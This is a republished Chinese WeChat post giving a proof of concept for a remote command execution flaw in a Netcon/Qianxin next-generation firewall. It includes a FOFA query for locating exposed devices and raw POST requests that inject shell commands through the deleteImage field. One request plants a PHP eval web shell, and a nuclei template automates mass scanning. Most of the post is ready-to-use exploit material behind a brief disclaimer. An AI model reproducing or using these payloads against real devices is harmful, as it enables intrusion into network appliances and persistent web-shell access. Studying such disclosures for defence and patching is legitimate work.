一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
三、资产梳理:
fofa: app="网康科技-下一代防火墙"
四、漏洞复现:
写入文件:
五、POC:
POST /directdata/direct/router HTTP/1.1Host: ipCookie: PHPSESSID=0luhut5imi4efh4fle1qdcram3; ys-active_page=s%3AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: https://123.234.82.26:11443/wuhu.txtContent-Type: application/x-www-form-urlencodedContent-Length: 160Origin: https://123.234.82.26:11443Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/wuhu.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
写入文件:
POST /directdata/direct/router HTTP/1.1Host: ipCookie: PHPSESSID=0luhut5imi4efh4fle1qdcram3; ys-active_page=s%3AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: https://123.234.82.26:11443/wuhu.txtContent-Type: application/x-www-form-urlencodedContent-Length: 183Origin: https://123.234.82.26:11443Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php phpinfo();?>' >/var/www/html/wuhu.php"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
nuclei批量检测
id: qianxin_wangkang_rceinfo:name: qianxin_wangkang_rceauthor: joyboyseverity: criticaldescription: http://xxx.xxx.xxx/directdata/direct/routermetadata:max-request: 1fofa-query: app="网康科技-下一代防火墙"verified: truetags: qianxin_wangkang_rce,rcerequests:- raw:- |-POST /directdata/direct/router HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: {{Hostname}}{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/wuhu.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}#{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php @eval($_POST[6677]);?>' >/var/www/html/wuhu.php"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}- |+GET /wuhu.txt HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36req-condition: truematchers:- type: dslcondition: anddsl:- 'contains((body_2), "uid=") && status_code_2 == 200'
原文始发于微信公众号(fly的渗透学习笔记):*安信 网*科技防火墙远程命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论